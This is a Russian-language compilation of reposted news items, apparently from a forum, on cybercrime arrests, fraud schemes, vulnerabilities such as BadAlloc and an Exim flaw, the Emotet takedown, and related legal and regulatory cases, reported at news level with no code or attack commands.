Для проведения необходимых специфических мероприятий следователи приобщили к процессу сотрудников отдела противодействия киберпреступности и Управления внутренней безопасности. В результате было установлено, что версия следователей полностью подтвердилась.
24-летний житель Северодонецка арендовал помещение, где организовал "саll- центр", в котором круглосуточно работали около 30 сотрудников. Для них были наработаны специальные инструкции как вести себя с клиентами, что можно говорить, а что недопустимо. Деятельность этого центра заключалась в том, чтобы мошенническим путем завладевать деньгами со счетов клиентов государственных и иностранных банковских учреждений.
13 июля следователи при силовой поддержке бойцов батальона полиции особого назначения под процессуальным руководством прокуратуры провели обыск в так называемом офисе "саll-центра", где обнаружили и изъяли средства мобильной связи и коммуникации, планшетные устройства, компьютерную технику и прочее.
Сейчас в рамках открытого по данному факту уголовного производства по статье 190 Уголовного кодекса Украины (мошенничество) следователи проводят необходимые следственно-оперативные действия, чтобы в полном объеме установить потерпевших от преступных действий мошенников и привлечь к уголовной ответственности организатора "саll-центра" и его сообщников.
Эксперты компании Microsoft обнаружили 25 уязвимостей, которые влияют на широкий спектр IoT-устройств и промышленное оборудование, используемое в промышленных, медицинских и корпоративных сетях. Эти уязвимости получили общее название BadAlloc.
«Уязвимости удаленного выполнения кода (RCE) связаны с 25 CVE и потенциально опасны для широкого спектра доменов, от потребительского и медицинского интернета вещей, до промышленного интернета вещей, операционных технологий и промышленных систем управления.
Уязвимости связаны со стандартными функциями распределения памяти (memory allocation), и затрагивают широко используемые RTOS, встроенные SDK и имплементации стандартной библиотеки C (libc)», — пишут эксперты.Click to expand...
Исследователи поясняют, что ошибки BadAlloc возникают в силу того, что различные «имплементации распределения памяти, многие годы создававшиеся как часть устройств IoT и встроенного программного обеспечения, не имели надлежащей проверки входных данных». В итоге злоумышленник может использовать баги memory allocation для провоцирования переполнения хипа, что приведет к выполнению вредоносного кода на целевом устройстве. Как отметили в Microsoft, такие атаки могут выполняться как локально, так и удаленно, если устройство доступно в интернете.
 
По данным специалистов, уязвимости были обнаружены в составе следующих продуктов:
Согласно сообщению, опубликованному Агентством по кибербезопасности и защите инфраструктуры, организованным при Министерстве внутренней безопасности США (DHS CISA), на данный момент только 15 из 25 затронутых производителей представили обновления для исправления проблем BadAlloc. Ожидается, что остальные десять поставщиков выпустят патчи «в ближайшие месяцы».
Пока для этих ошибок нет доступных эксплоитов, однако это может легко измениться в ближайшие недели или месяцы. CISA присвоило проблемам BadAlloc оценку 9,8 баллов из 10 возможных, и призвала все затронутые организации как можно скорее исправить уязвимости.
Ни CISA, ни Microsoft пока не опубликовали даже приблизительные оценки количества затронутых продуктов. Однако судя по тому, какие производители вошли в приведенный выше список, количество уязвимых устройств может исчисляться миллиардами.
Источник: xakep.ru/2021/04/30/badalloc/
Федеральная антимонопольная служба наложила на компанию Apple оборотный штраф в размере 906 299 392,16 рублей (около 12 млн долларов США) за нарушение антимонопольного законодательства.
«Было установлено, что Apple злоупотребила доминирующим положением на рынке распространения мобильных приложений на операционной системе iOS, путем совершения ряда последовательных действий, которые привели к предоставлению конкурентных преимуществ собственным продуктам и одновременному ухудшению условий распространения продуктов конкурентов – приложений "родительского контроля"», — сообщается на сайте ведомства.
Click to expand...
Также ФАС установила, что положения документации Apple содержат неограниченное усмотрение ответчика, что может привести к ограничению конкуренции на смежных рынках.
Дело, по которому в итоге оштрафовали Apple, было возбужденного после заявления по заявления «Лаборатории Касперского» в 2019 году. Тогда представители компании заявили, что Apple не позволила разместить в App Store обновленную версию приложения Kaspersky Safe Kids и одновременно с этим запустила собственный сервис «родительского контроля», появившийся вместе с функцией Screen Time.
В итоге ФАС признала Apple виновной в злоупотреблении на рынке онлайн- приложений и выдала Apple предписание об устранении нарушений: компания была обязана удалить из своей документации положения, дающие ей право не допускать в App Store приложения сторонних разработчиков по любой причине, даже если они соответствуют всем правилам.
Также предписание ФАС обязывает Apple не допускать преимущественных условий для приложений собственной разработки по сравнению с приложениями сторонних разработчиков и обеспечить для разработчиков приложений «родительского контроля» возможность распространения приложений в App Store без потери важной функциональности.
Представители Apple сообщили, что не согласны с решением антимонопольной службы и наложенным штрафом, и будут их оспаривать. В настоящее время исполнение предписания приостановлено в связи с обжалованием в суде.
Источник: xakep.ru/2021/04/27/fas-apple/
В январе текущего года Европол, ФБР и правоохранительные органы многих стран мира, включая Канаду, Нидерланды, Францию, Германию, Литву, Великобританию и Украину, провели масштабную скоординированную операцию по ликвидации ботнета Emotet, подготовка к которой длилась два года.
Тогда правоохранители объединили усилия, и им удалось захватить контроль над инфраструктурой Emotet, нарушив ее работу. В итоге преступники лишились возможности использовать взломанные машины, а малварь прекратила распространяться на новые цели.
Более того, правоохранители использовали свой доступ к управляющим серверам Emotet, которые оказались под контролем Федерального ведомства уголовной полиции Германии (Bundeskriminalamt), для развертывания специального обновления на всех зараженных хостах.
Новый модуль для Emotet, созданный специалистами Bundeskriminalamt, был распространен на все зараженные системы в виде 32-разрядного файла EmotetLoader.dll. Это обновление содержало «бомбу замедленного действия»: механизм, которые должен был привести к удалению Emotet со всех зараженных машин 25 апреля 2021 года в 12:00 по местному времени.
В январе представители Bundeskriminalamt сообщили журналистам Bleeping Computer, что четырехмесячная задержка обусловлена сбором улик:
«Идентификация скомпрометированных систем необходима для сбора доказательств, а также она позволит заинтересованным пользователям провести полную очистку своих систем для предотвращения дальнейших правонарушений. Для этого коммуникационные параметры ПО были скорректированы таким образом, чтобы системы жертв более могли взаимодействовать с инфраструктурой преступников, и работали с инфраструктурой, созданной для сбора доказательств».
Click to expand...
Этот "запланированный сбой" должен фактически обнулить Emotet, вынудив операторов малвари начинать все заново, и предоставив ИТ-персоналу по всему миру возможность найти и обезопасить зараженные устройства.
Еще в начале года исследователи Malwarebytes внимательно изучили этот модуль и принципы его работы. Они заметили, что если изменить системное время на тестовой машине и запустить модуль, тот удалил только связанные службы Windows, ключи автозапуска из реестра, а затем заверит процесс, оставив все остальное на скомпрометированном устройстве нетронутым.
__https://twitter.com/x/status/1356000280396111876
«Чтобы со временем этот подход был успешным, важно как можно внимательнее следить за этими обновлениями, и, по возможности, задействованные правоохранительные органы, которые должны публиковать эти обновления в открытом интернете, чтобы аналитики могли быть уверены, что что-либо нежелательное не избежало [удаления]», — говорили эксперты Malwarebytes.
Click to expand...
Bleeping Computer отмечает, что эксперты ФБР, Европола и Bundeskriminalamt никак не прокомментировали прошедшее 25 апреля и удаление Emotet из зараженных систем. Пока правоохранители отказались говорить об этом с представителями СМИ.
Источник: xakep.ru/2021/04/26/emotet-kill-switch/
На территории Беларуси действовали две организованные группы, которые занимались хищениями денег у пользователей крупнейшей площадки объявлений. По фактам их деятельности возбуждено более 2 700 уголовных дел, которые соединены в одном производстве. Подробности громкого расследования в эфире программы «Причины и следствие» на «Радио-Минск» рассказал официальный представитель Следственного комитета Александр Суходольский, сообщает корреспондент агентства «Минск- Новости».
Основной инструмент для совершения преступлений в Сети — фишинговые ссылки, при переходе по которым пользователь вводится в заблуждение. В результате он раскрывает конфиденциальные данные мошенникам, а те похищают деньги с карт- счета. Именно так действовали на «Куфаре» кибермошенники, изрядно запятнав репутацию сетевой площадки объявлений.
Чтобы понимать масштабы злодеяний, совершенных сетевыми аферистами, начнем с цифр. Участники организованной преступной группы совершили порядка 20 тыс. хищений. Ущерб, причиненный компьютерными мошенниками, исчисляется миллионами рублей. В состав преступной скам-группы входило более 1 300 участников. Все они соблюдали меры конспирации и общались анонимно, обмениваясь информацией в закрытых чатах. Средой для общения, доступа к преступному инструментарию, распределению средств между участниками и их обучения выступал мессенджер Telegram. Следователи выяснили, что за сутки аферисты совершали до 30 хищений с карт-счетов граждан Беларуси. По таким фактам возбуждено более 2 700 уголовных дел, которые соединены в одном производстве.
Еще до задержания участников преступной группы сотрудники СК получили доступ к программным продуктам скам-группы. Они подробно изучили механизм совершения преступлений, а заодно модифицировали программное обеспечение. Это сделало невозможным дальнейшее хищение денег, что свело практически к нулю деятельность ОПГ.
Кроме того, сотрудники СК установили сложную структуру преступной группировки. Отметим, что деятельность кибераферистов была организована достаточно профессионально. Не у всех организаций имеется такой штат, который придумали мошенники. Судите сами, какие роли играли мошенники:
• «топикстартер» — руководитель организованной группы, основатели (сооснователи) мошеннических схем;
• администраторы — лица, имеющие доступ к панели управления интернет- ресурсами, использующихся в преступной деятельности;
• «кодеры» — лица, осуществляющие разработку ПО, используемого в преступной деятельности;
• «sim-активаторы» — лица, оказывающие содействие участникам преступной группы в активации учетных записей в мессенджерах WhatsApp и Viber, для их дальнейшего использования в общении с лицами для последующего совершения хищений;
• «дроповоды» — лица, осуществляющие поиск сторонних граждан для открытия на них карт-счетов, которые в дальнейшем используются для совершения хищений;
• «вбиверы» — лица, осуществляющие несанкционированный вход в скомпрометированную учетную запись к карт-счету пользователя для хищения и перевода денег на подконтрольные организованной группе счета и электронные кошельки;
• «воркеры» — лица, ведущие переписку или разговоры с пользователями kufar.by, и убеждающие их по различным надуманным предлогам перейти по фишинговой ссылке для компрометации их платежных реквизитов.
Физически участники скам-группы находятся и проживают как на территории Беларуси, так и в России, Украине, Казахстане, Польше и других странах. Все они — молодые люди в возрасте от 17 до 30 лет. Многие осуществляли свою преступную деятельность одновременно в составе нескольких различных преступных групп, которые специализируются на разных способах интернет-хищений.
Главным управлением цифрового развития предварительного следствия СК завершено расследование в отношении одного из руководителей крупнейшего транснационального скам-сообщества, работавшего по Беларуси.
Как выяснили следователи, организованная преступная группа была создана в 2021 году. В ее состав входило более 700 участников из Украины, России, Беларуси и других русскоязычных стран.
Скам-группа специализировалась на совершении хищений денег с карт-счетов пользователей торговых онлайн-площадок с использованием фишинговых интернет- ресурсов, имитирующих такие площадки, сервисы служб доставки, платежные сервисы.
С 2021 по 2023 годы участники группировки более 6 тыс. раз похитили с помощью фишинга у белорусских граждан не менее 1,7 млн рублей.
На след скам-сообщества киберследователи вышли в августе 2022 г. Благодаря применению новых разработок и экспериментальных методик были установлены личности руководящего звена, зафиксирован используемый группировкой преступный инструментарий и совершенные преступления.
На первоначальном этапе расследование было сконцентрировано на пресечении преступной деятельности организованной группы, продолжающей ежемесячно совершать сотни хищений. Для этого требовалось установить личность и задержать одну из ключевых фигур группировки — разработчика программных продуктов. Такой софт позволял автоматизировать совершение хищений. В среде кибермошенников такого участника группировки называют «кодером». Он применял всевозможные технические уловки для своей конспирации. Например, на личный визуальный контакт с другими участниками группировки никогда не выходил — использовал только онлайн общение и вымышленные данные. В распоряжении следователей имелся только его сетевой псевдоним.
По крупицам информации, оставленной «кодером» на просторах интернета, удалось составить его «цифровой портрет» и установить личность. Ключевой фигурой транснационального скам-сообщества оказался 17-летний минчанин.
По крупицам информации, оставленной «кодером» на просторах интернета, удалось составить его «цифровой портрет» и установить личность. Ключевой фигурой транснационального скам-сообщества оказался 17-летний минчанин.
Следователями совместно с МВД была спланирована и реализована уникальная операция по задержанию руководителя скаммеров. Выстроенная им многоуровневая система защиты от изобличения оказалась бесполезной. Следователям и милиции удалось обезвредить кибермошенника в его квартире и получить доступ ко всем цифровым доказательствам. В ходе обыска обнаружены и изъяты программные средства совершения преступлений, базы данных с информацией о преступной деятельности группировок.
За свою работу молодой человек получал 5 % от суммы всех денег, похищаемых скам-сообществом у белорусских граждан. За полтора года участия в преступной деятельности группировки до задержания он заработал более 90 000 рублей.
Подросток признал свою вину в участии в деятельности транснационального скам- сообщества, детально рассказал об участниках группировки и совершенных ими преступлениях. В дальнейшем в ходе проведения нескольких десятков операций на территории различных областей страны, а также на территории России были задержаны еще 34 участника транснационального скам-сообщества, в том числе из числа руководителей.
Почти все они уже осуждены. По приговору суда, в зависимости от роли в преступной схеме им назначено наказание: от 5 до 8 лет лишения свободы.
Сразу пять человек входили в группу промоутеров, занимавшихся организацией и исполнением пиар-акций маркетплейса Kraken в Санкт-Петербурге. Их задержания произошли после того, как 23 сентября на Невском проспекте на балконе третьего этажа появились колонка и большой баннер с QR-кодом, ведущим на переходник Kraken.
Поднявшись в квартиру, силовики обнаружили в ней 32-летнего жителя города Никольское, находившегося, как отмечают силовики, «в состоянии повышенной взбудораженности». Против него было возбуждено дело по факту склонения к потреблению наркотиков. Оперативно подключившиеся к расследованию сотрудники управления по борьбе с распространением наркотиков, выявили целую сеть промоутеров, работавших в различных регионах страны.
«По оперативным данным, фантазия "промоутеров" не ограничивалась банальными трафаретными надписями или листовками с QR-кодом. В акциях активно использовались баннеры с акустическим и световым сопровождением и запускаемые на центральных городских улицах воздушные шары», — отметили в пресс-службе петербургской полиции.
После этого были оперативно задержаны еще четверо исполнителей акций в возрасте от 20 до 35 лет. Все они ранее были судимы за тяжкие и особо тяжкие преступления. У них изъяли баннеры с QR-кодами, а также смартфоны и другая техника. Все пятеро подозреваемых будут дожидаться суда в СИЗО.
Ozgur Alp is a member of the Synack Red Team and has been awarded SRT of the Year 2021, Most Trusted Hacker 2021, Mentor of the Year 2022 and SRT Grand Champion for 2019, 2020 and 2021.
Authentication bypass vulnerabilities are common flaws that exist in modern web applications—but they’re not always easy to find.
New authentication methods are working wonders to boost cybersecurity at many organizations. While tools like single sign-on (SSO) are often an improvement over old ways of logging users in, these technologies can still contain critical vulnerabilities. Whether it’s business logic errors or some other software flaw, it takes a keen eye to comb through all the complexity.
In this blog, I’ll cover five real-world authentication bypass techniques that I have found in the Synack Platform throughout my time as a member of the Synack Red Team.
Link :

](https://www.synack.com/blog/exploits-explained-5-unusual-authentication- bypass-techniques/)
% %
 www.synack.com
В кодовую базу, на основе которой будет сформирован выпуск ядра Linux 6.6, передано изменение, убирающие упоминание Агентства национальной безопасности США из опций, связанных с включением системы принудительного контроля доступа SELinux. Механизм SELinux был разработан АНБ, включён в состав ядра Linux в 2003 году и используется во многих дистрибутивах Linux, включая Fedora и Red Hat Enterprise Linux. Вопреки спекуляциям о возможном внесении закладок, реализация SELinux была многократно проверена и подвергнута независимому аудиту.
Последние 20 лет технология развивается при активном участии сообщества и не воспринимается как разработка, контролируемая АНБ. Так как проект уже давно развивается под крылом сообщества и сопровождается независимыми мэйнтейнерами решено перейти на использование имени "SELinux" вместо "NSA SELinux" в комментариях и документации в Kconfig (например, пояснение к сборочному параметру SECURITY_SELINUX изменено с "NSA SELinux Support" на "SELinux Support").
Скорее всего попытаюсь обменять чувака на какого-нибудь очередного Виктора Бута.
Журналист The Wall Street Journal, американец Эван Гершкович задержан в Екатеринбурге по подозрению в шпионаже, сообщил Центр общественных связей ФСБ в четверг.
"Федеральной службой безопасности Российской Федерации пресечена противоправная деятельность аккредитованного при МИД России корреспондента московского бюро американской газеты The Wall Street Journal гражданина США Гершковича Эвана, 1991 г.р., подозреваемого в шпионаже в интересах американского правительства", - заявили в спецслужбе.
По данным ФСБ, Гершкович, "действуя по заданию американской стороны, осуществлял сбор сведений, составляющих государственную тайну, о деятельности одного из предприятий российского военно-промышленного комплекса".
"При попытке получения секретных сведений американец был задержан в Екатеринбурге", - заявили в спецслужбе.
Следственным управлением ФСБ России в отношении гражданина США возбуждено уголовное дело по ст. 276 Уголовного кодекса РФ (шпионаж). Журналисту грозит наказание до 20 лет лишения свободы.
Задержание Гершковича прокомментировала в своем телеграм-канале официальный представитель МИД РФ Мария Захарова. "То, чем занимался в Екатеринбурге сотрудник американского издания The Wall Street Journal, не имеет отношения к журналистике. К сожалению, это не первый случай, когда статус "иностранного корреспондента", журналистская виза и аккредитация используются иностранцами в нашей стране для прикрытия деятельности, не являющейся журналистикой. Уже не первого известного западника "хватают за руку", - написала она.
Суд Сан-Антонио (штат Техас) вынес приговор в отношении семейной пары по обвинениям в мошенничестве с помощью SIM-свопинга. Об этом говорится в заявлении Минюста США.
Согласно судебным документам, при помощи этой схемы 22-летний Эндрю Перси Трухильо и 34-летняя Зена Элиза Доунсон украли $250 000 в криптовалюте.
В ходе следствия выяснилось, что мужчина работал в салоне сотовой связи AT&T. Используя служебное положение, он привязывал телефон Доунсон в качестве дополнительного пользователя к SIM-картам жертв.
Такой метод позволял злоумышленникам перенаправлять сообщения и звонки на другое устройство. В результате супруги получали доступ к чужим криптовалютным счетам и переводили активы на свой кошелек.
«SIM-свопинг — это быстро развивающаяся схема мошенничества, о которой все обязаны знать. […] Любой, кто использует двухфакторную аутентификацию, должен помнить, что этот метод не является на 100% надежным. Пользователям по-прежнему необходимо следить за любой подозрительной активностью, связанной с их телефонами», — заявил прокурор Хайме Эспарза.
Click to expand...
Подсудимые признали себя виновными. Трухильо приговорили к 33 месяцам лишения свободы и трем годам условно, а также обязали выплатить компенсацию в размере $282 000. Его сообщница получила два месяца тюремного заключения, пять лет условного срока и аналогичное денежное взыскание.
В сентябре 2021 года житель Техаса подал иск против AT&T. По его мнению, он стал жертвой подмены SIM-карты по вине телекоммуникационного гиганта и потерял 159,8 ETH.
Ранее Центральный окружной суд Калифорнии отклонил жалобу основателя группы биткоин-инвесторов BitAngels Майкла Терпина к AT&T о возмещении ущерба.
Истец утверждал, что в 2018 году компания содействовала мошенникам в подмене SIM-карты, из-за чего он потерял криптовалюту на сумму $24 млн. Инвестор требовал выплатить ему $200 млн. Однако суд не нашел подтверждения мошенничества и халатности сотрудников компании.
Напомним, в марте 2023 года власти США арестовали гражданина Китая Майлза Го по обвинению в мошенничестве с цифровыми активами на $1 млрд. Он обманным путем заставлял своих жертв инвестировать в онлайн-клуб G |CLUBS.
source: justice[.]gov/usao-wdtx/pr/sim-card-swapping-fraudsters-sentenced-san- antonio
Агентство по финансовому мониторингу Казахстана обнаружило в Астане нелегальную площадку для обмена цифровых активов и конфисковало денежные средства на сумму более $350 тыс.
В Казахстане выявили и пресекли деятельность нелегального криптовалютного обменника ABS Change с оборотом $34 млн.
Трое граждан Казахстана занимались незаконной предпринимательской деятельностью, управляя пунктом по обмену криптовалют вне территории международного финансового центра «Астана» (МФЦА), говорится в объявлении агентства. Такая деятельность разрешена в Казахстане только при наличии лицензии и только на территории МФЦА.
Незаконный обменный пункт работал в Астане с 2021 года. По предварительной информации АФМ, общий оборот криптокошельков ABS Change на бирже Binance составил почти $34 млн.
Правоохранительные органы изъяли вещи организаторов серого обменника и денежные средства на сумму $342 тыс. и 7 млн тенге (около $16,1 тыс.). Были выявлены также криптоактивы на сумму почти $23 тыс. в двух криптокошельках на Binance, они временно заблокированы. Расследование продолжается.
Правила, согласно которым на территории Казахстана разрешены операции с криптовалютами при соблюдении определенных условий, были утверждены в прошлом мае. Пилотный проект запущен на территории МФЦА, для участия в нем криптоплатформам необходимо получить лицензию, а банкам — заявить о присоединении.
АФМ активно пресекает деятельность нелегальных площадок, работающих с криптовалютой вне МФЦА. В январе ведомство сообщило, что выявило пять нелегальных обменников, в них были проведены обыски, конфискованы техника и криптокошельки, заморожены активы организаторов на криптобиржах.
Среди этих обменников был пункт KZobmen. В середине февраля АФМ арестовало имущество россиянина на сумму $187,7 тыс. за незаконные операции с криптовалютой через эту площадку.
source: gov.kz/memleket/entities/afm/press/news/details/518504?lang=ru
Министерство юстиции США сообщило, что из Польши экстрадирован 28-летний гражданин Украины Глеб Иванов-Толпинцев, которого обвиняют в продаже доступов к взломанным компьютерным системам через специализированный маркетплейс в даркнете.
Согласно судебным документам, подозреваемый более четырех лет управлял ботнетом, который использовал для проведения брутфорс-атак. Предположительно, он подбирал учетные данные от RDP.
Сообщается, что Иванов-Толпинцев работал в сети под несколькими никами, и следователи идентифицировали его настоящую личность, обратившись с запросом на доступ к его почте в Google и узнав Jabber, который он использовался для связи с покупателями.
Изучив чаты Jabber, ФБР узнало, как Иванов-Толпинцев стать продавцом в даркнете. Так, в 2017 году он интересовался тем, какие требования неназванная торговая площадка предъявляет к продавцам, и ему сообщили, что нужно иметь базу учетных данных по крайней мере для 5000 серверов и выставлять на продажу не менее 500 учетных данных каждую неделю. Подозреваемый сообщил, что удовлетворяет этим требованиям.
Министерство юстиции сообщает, что в итоге Иванов-Толпинцев брутфорсил и выставлял на продажу примерно 2000 учетных данных в неделю. Под ником Mars он продал доступы к 6704 компьютерам, и заработал на этом 82 648 долларов.
Американские власти говорят, что теперь украинцу грозит до 17 лет лишения свободы, если тот будет признан виновным по всем обвинениям, включая сговор, торговлю устройствами несанкционированного доступа и торговлю паролями для компьютерных систем.
• Source: justice[.]gov/usao-mdfl/pr/ukrainian-cyber-criminal-extradited- decrypting-credentials-thousands-computers-across
• Source: justice[.]gov/usao-mdfl/press-release/file/1431116/download
a.k.a Gleb Aleksandr Ivanov-Tolpintsev
a.k.a Sergios
a.k.a Mars
Столичные правоохранители, при процессуальном руководстве Подольской окружной прокуратуры, разоблачили преступную группу, которая под видом инвестирования в криптовалюту и работы с вкладчиками обманным путем завладели 3 млн долларами десятка граждан, в том числе иностранцев. Участникам группы сообщено о подозрении в мошенничестве в особо крупных размерах.
Об этом KV стало известно из сообщения пресс-службы Киевской городской прокуратуры.
"Начиная с 2021 года злоумышленники через интернет и социальные сети рекламировали свои услуги, гарантируя потенциальным клиентам получение сверхприбылей на рынке виртуальных активов (криптовалюты), а именно ее покупки по выгодной цене и последующей продаже по цене выше закупочной", – сказано в сообщении.
Отмечается, что участники преступной группы в составе 7 человек также предлагали услуги по реализации арбитража трафика, являющегося разновидностью онлайн-бизнеса, суть которого заключается в покупке и последующей перепродаже ранее купленного трафика на более выгодных условиях.
Также руководитель группы ввел еще один вид мошенничества, заключавшийся во взыскании с инвесторов оплаты комиссии за будто бы последующий вывод заработанных денежных средств. Для создания “положительного” представления об успешности такого бизнеса злоумышленники арендовали офис в Киеве, создали в нем колл-центр и на созданных страницах в соцсети демонстрировали ролики, рассказывающие об успехах в работе с инвесторами.
Минимальный взнос от клиента составлял 11 тыс. гривен. После получения средств на электронные кошельки и банковские счета, обманутых клиентов блокировали, а полученные от них деньги распределялись между членами группы.
Правоохранители задержали 21-летнего жителя Киева, который организовал схему, непосредственно во время получения от инвестора 400 тыс. гривен.
По предварительным данным, злоумышленники обманули десятки граждан, в том числе иностранцев, на сумму около 3 млн гривен.
В настоящее время организатору и шести его сообщникам сообщено о подозрении по ч. 4 ст. 190 УК Украины, то есть в совершении мошенничества в особо крупных размерах, и решается вопрос об избрании мер пресечения.
Следственные действия продолжаются. Устанавливаются другие участники преступной схемы, а также граждане, пострадавшие от их противоправных действий.
Санкция статьи предусматривает до 12 лет лишения свободы с конфискацией имущества.
Два исследователя безопасности, нанятые представителями судебной власти Айовы для проверки безопасности в зданиях суда, подали в суд на шерифа, арестовавшего их за попытку ограбления, несмотря на наличие разрешения от правительства штата на проведение тестирований.
В 2019 году Гэри Демеркьюрио (Gary DeMercurio) и Джастин Уинн (Justin Wynn) поступили на работу в ИБ-компанию Coalfire. Согласно поданному 30 июля 2021 года исковому заявлению, в то время компания получила контракт на «проведение тестирования кибербезопасности, включая физическое проникновение», в пяти разных зданиях.
В обязанности Демеркьюрио и Уинна входили «физические атаки», в том числе взлом замков с помощью отмычки в здании окружного суда Далласа вечером 20 сентября 2019 года. Поэтому, когда исследователи проникли в здание и сработала сигнализация, они сразу же предъявили прибывшим на место помощникам шерифа соответствующее разрешение от правительства Айовы.
Помощники шерифа даже позвонили представителям судебной власти штата и были удовлетворены их ответом. Тем не менее, когда на место прибыл шериф Чед Леонард (Chad Leonard), ситуация резко изменилась, говорится в исковом заявлении. Шериф проигнорировал предъявленный им документ и приказал помощникам арестовать Демеркьюрио и Уинна. Исследователям надели наручники, а их собственность была изъята. Мужчины были задержаны на 20 часов, но затем выпущены под залог в размере $50 тыс. В результате им были предъявлены обвинения в краже со взломом и владении инструментами для взлома.
Позднее обвинения были смягчены, а потом и сняты вовсе. Однако, как пояснил изданию Insider адвокат тестировщиков Марти Диаз (Marty Diaz), его подзащитные не просто провели одну беспокойную ночь за решеткой. Они стали жертвами нарушения их гражданских прав и подверглись унижению, в результате которого им был причинен моральный ущерб и эмоциональный стресс.
Как пояснил Диаз, спустя два года после ареста его подзащитные продолжают ощущать его последствия. Они лишились заманчивых предложений работы, поскольку, когда потенциальные работодатели гуглили имена Демеркьюрио и Уинна, появлялись статьи об их аресте и фотографии в тюремной робе.
По словам адвоката, шериф Леонард использовал исследователей в качестве «козлов отпущения» в своих «терках» с правительством штата. Позиция шерифа заключалась в том, что раз здание принадлежит окружному правительству, то и право проводить тестирования есть только у окружного правительства, сообщил Диаз. Однако здание суда подведомственно штату Айова, у которого есть право разрешать такие тестирования.
Ранним утром 28 июня около сотни офицеров французской национальной жандармерии
(Gendarmerie Nationale) и молдавской пограничной полиции (Poliția de Frontieră
a Republicii Moldova) при поддержке Европола "накрыли" членов организованной
преступной группы, участвовавшей в крупных финансовых махинациях, сообщает
Европол.
7 обысков было произведено в Париже и ещё 25 - в Кишиневе. В общей сложности 9
человек - 8 граждан Молдовы и 1 гражданин Франции - были арестованы за участие
в этой схеме, в результате которой власти Франции лишились более 2 миллионов
евро.
Следствие раскрыло схему, созданную этой ОПГ. Преступники завербовали более 1 000 граждан Молдовы, чтобы под ложным предлогом подать заявление на участие в программе, финансируемой Управлением по иммиграции и интеграции Франции и Министерством иностранных дел Франции. Эта программа направлена на содействие социальной и экономической реинтеграции молдавских мигрантов, которые добровольно вызвались вернуться в Молдову из Франции.
Преступники перевозили нанятых молдован автобусом в Париж, где те обращались за финансовой поддержкой по этой программе, используя поддельные документы. Затем они незамедлительно возвращали в Молдову, при этом получая от 700 до 1350 евро за счастливое "возвращение" на родину. Оставшуюся часть финансовой поддержки - от 5 000 до 7 000 евро за каждого "мигранта", забирали преступники.
• Source: europol.europa.eu/newsroom/news/9-arrested-in-moldova-and-france- for-%E2%82%AC2-million-immigration-fraud
В Нью-Йорке осудили организаторов преступной схемы, которые провели через финансовую систему США более 150 миллионов долларов, заработанных на продаже марихуаны. Присяжные признали их виновными и обвинили в сговоре с целью банковских махинаций. Об этом в среду сообщил представитель Министерства юстиции.
Хамиду Ахавану по прозвищу Рэй и Рубену Вейганду грозит до 30 лет лишения свободы.
«Обычно подозрительную и незаконную деятельность выявляют банки и компании — эмитенты кредитных карт. Не попадая на их радары, эти люди оказывали различные услуги: регистрировали фиктивные компании и сайты, генерировали фальшивый веб- трафик на этих сайтах — и все это для того, чтобы мошенническим путем проводить деньги через финансовую систему Соединенных Штатов», — сказала прокурор по Южному округу Нью-Йорка Одри Страусс.
«Как установили присяжные, Рэй Ахаван и Рубен Вейганд торговали ложью», — добавила она.
Вместе с сообщниками преступники обманом заставляли банки и компании, выпускающие кредитные карты, обрабатывать платежи за покупку и доставку продуктов из конопли. Используя офшорные счета подставных фирм, они представляли эти трансакции как платежи за товары для собак, снаряжение для дайвинга, газированные напитки, зеленый чай и кремы для лица.
• Source: justice[.]gov/usao-sdny/pr/jury-convicts-creators-scheme- fraudulently-process-over-150-million-through-us
Представители регулятора сообщили о блокировке Viber на территории РФ из-за неисполнения требований российского законодательства.
«Доступ к сервису Viber ограничен в связи с нарушением требований российского законодательства к организаторам распространения информации, выполнение которых необходимо для предотвращения угроз использования мессенджера в террористических и экстремистских целях, вербовки граждан для их совершения, продажи наркотиков, а также в связи с размещением противоправной информации», — гласитофициальное сообщение в Telegram-канале Роскомнадзора.
Click to expand...
Одновременно с этим депутат Госдумы и член комитета по информполитике Антон Немкин напомнил в своем Telegram-канале, что сумма штрафов в отношении Viber превышает 1,8 млн рублей, и «мессенджер продолжает игнорировать российское законодательство и не удалять запрещенную информацию, включая сведения, касающиеся СВО».
Как отмечает «Интерфакс», еще в январе 2022 года владелец мессенджера Viber - компания Viber Media S.a r.l., зарегистрированная в Люксембурге, открыла представительство в России для соблюдения закона о «приземлении».
Согласно данным соответствующего перечня РКН, компания выполнила все основные обязанности иностранного лица по этому закону: не только открыла представительство в России, но и завела личный кабинет на сайте РКН, а также создала электронную форму для обращения российских пользователей на своих интернет-ресурсах.
Студенты Физтех-школы прикладной математики и информатики МФТИ в финале международного чемпионата ICPC победили противников из американского Массачусетского университета и китайского университета Цинхуа. Заслуженное золото – у наших ребят!
Состав команды-победительницы
• Денис Мустафин
• Всеволод Нагибин
• Тихон Евтеев
Тренеры команды
• Филипп Рухович — доцент кафедры алгоритмов и технологий программирования
МФТИ
• Демид Кучеренко — заместитель директора ФПМИ МФТИ по спортивному
программированию
ICPC — крупнейший мировой чемпионат по алгоритмическому программированию для студентов. В этом году в нём приняли участие команды из более чем 50 стран мира. В финал вышли представители 8 российских университетов: МФТИ, МАИ, ВШЭ, НГУ, ИТМО, Сколтех, СПбГУ и СПбГУПТД.
• Source: https://t.me/ICPCNews/879
Компания Censys предупредила о критической уязвимости в почтовых серверах Exim, которая затрагивает более 1,5 миллионов серверов по всему миру. Уязвимость CVE-2024-39929 (оценка CVSS: 9.1 ) вызвана некорректным синтаксическим анализом многострочных имен файлов заголовков RFC2231, что позволяет удаленному атакующему обходить защиту $mime_filename. Ошибка позволяет доставлять исполняемые файлы в почтовые ящики пользователей, которые могут скомпрометировать систему при открытии.
На данный момент зафиксировано 1 532 163 публично доступных сервера Exim, работающих на уязвимой версии (4.97.1 или более ранняя). Большинство серверов находятся в США, России и Канаде. Администраторам серверов Exim рекомендуется срочно обновить программное обеспечение до последней версии с исправлением уязвимости. Если обновление невозможно, следует ограничить удаленный доступ к серверам из интернета, чтобы предотвратить попытки эксплуатации уязвимости.
[30 комментариев](https://hackaday.com/2024/01/05/getting-root-access-on-a- telsa/#comments)

Все больше производителей блокируют совершенно хорошее оборудование за
произвольными программными ограничениями. Хотя это должно стать более
серьезным противоречием, люди, похоже, продолжают платить за такие вещи, как
принтеры с подпиской на чернила, камеры с функциями, отключенными в прошивке,
или маршрутизаторы с ограничениями скорости, гарантируя, что эта практика
будет продолжаться. Возможно, наиболее вопиющим является то, что производители
автомобилей блокируют такие функции, как подогрев сидений или даже улучшения
производительности, в надежде обеспечить более высокую цену на свои
автомобили. Это может остаться в прошлом для Tesla, чье программное
обеспечение было недавно разблокировано берлинскими ИТ-
исследователями
.
